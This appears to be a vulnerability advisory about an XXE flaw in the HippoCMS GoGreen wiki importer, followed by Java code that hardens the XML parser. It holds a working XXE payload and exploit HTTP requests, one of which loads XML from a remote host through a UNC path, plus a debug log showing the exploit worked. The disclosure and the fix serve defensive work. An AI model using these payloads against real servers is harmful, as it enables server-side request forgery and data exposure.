Description
Positive Technologies experts have detected an XXE vulnerability in HippoCMS-GoGreen-7.9.4:
Entry point:
hippogogreen-3.09.06\site\src\main\java\com\onehippo\gogreen\importer\NonWorkflowWikiImporterComponent.java, line 90
String wikiContentFileSystem = request.getParameter("filesystemLocation");

Exit point:
hippogogreen-3.09.06\site\src\main\java\com\onehippo\gogreen\importer\NonWorkflowWikiImporterComponent.java, line 121
parser.parse(f, handler);
https://issues.onehippo.com/browse/GOGREEN-1222
HippoCMS-GoGreen-7.9.4\tomcat\webapps\site\WEB-INF\classes\com\onehippo\gogreen\importer\NonWorkflowWikiImporterComponent.class
Exploit 1: load XML from a local file and make an HTTP request to a local web server
xxe.xml:
<?xml version="1.0"?><!DOCTYPE abc [
<!ELEMENT abc ANY>
<!ENTITY xxe SYSTEM "http://localhost/test.php?test=xxe_test">
]><abc>&xxe;</abc>
exploit:
GET /site/_hn:action%7Cr20_r1_r1%7C/importer?number=1&offset=&filesystemLocation=c%3A%5Cxxe.xml&type=news HTTP/1.1
Host: localhost:8080
Connection: close
In debug log:
array (
'HTTP_USER_AGENT' => 'Java/1.8.0_45',
'HTTP_HOST' => 'localhost:80',
'SERVER_NAME' => 'localhost',
'SERVER_ADDR' => '127.0.0.1',
'SERVER_PORT' => '80',
'REMOTE_ADDR' => '127.0.0.1',
'REQUEST_SCHEME' => 'http',
'REMOTE_PORT' => '35273',
'GATEWAY_INTERFACE' => 'CGI/1.1',
'SERVER_PROTOCOL' => 'HTTP/1.1',
'REQUEST_METHOD' => 'GET',
'QUERY_STRING' => 'test=xxe_test',
'REQUEST_URI' => '/test.php?test=xxe_test',
'SCRIPT_NAME' => '/test.php',
'PHP_SELF' => '/test.php',
)
Exploit 2: load XML from a remote host using a Windows UNC path
GET /site/_hn:action%7Cr20_r1_r1%7C/importer?number=1&offset=&filesystemLocation=\\server\xxe_poc\xxe.xml&type=news HTTP/1.1
Host: localhost:8080
Connection: close
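
An added example, not code from the GoGreen project (the linked fix HGGE-291 removed the unused importer instead): how a sink like parser.parse(f, handler) can be hardened against both cases above, by rejecting DOCTYPE declarations and by confining the request-supplied path to one directory. The class name, IMPORT_ROOT and its value are assumptions made for the illustration.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Path;
import java.nio.file.Paths;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

public class HardenedWikiImport {
    // Assumption: the single directory that imports may be read from.
    private static final Path IMPORT_ROOT = Paths.get("/var/lib/gogreen/wiki-import");

    // SAX parser that rejects any DOCTYPE, so entities like &xxe; are never resolved.
    static SAXParser hardenedParser() throws Exception {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case DOCTYPE handling is ever re-enabled.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setXIncludeAware(false);
        return factory.newSAXParser();
    }

    // Map the request value to a file under IMPORT_ROOT. The lexical check runs first,
    // so absolute and UNC paths are refused before the file system (or network) is touched;
    // the toRealPath() check then catches symlinks that lead out of the root.
    static File resolveImport(String requested) throws IOException {
        Path root = IMPORT_ROOT.toRealPath();
        Path candidate = root.resolve(requested).normalize();
        if (!candidate.startsWith(root) || !candidate.toRealPath().startsWith(root)) {
            throw new IOException("import path outside " + root + ": " + requested);
        }
        return candidate.toFile();
    }

    public static void main(String[] args) throws Exception {
        File f = resolveImport(args[0]); // stands in for request.getParameter("filesystemLocation")
        try {
            hardenedParser().parse(f, new DefaultHandler());
            System.out.println("parsed " + f);
        } catch (SAXParseException e) {
            // A file carrying <!DOCTYPE ...> ends up here instead of triggering a fetch.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```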
Issue Links
- is forward ported by: HGGE-291 Remove unused WikiImporter because of potential XXE vulnerability (Closed)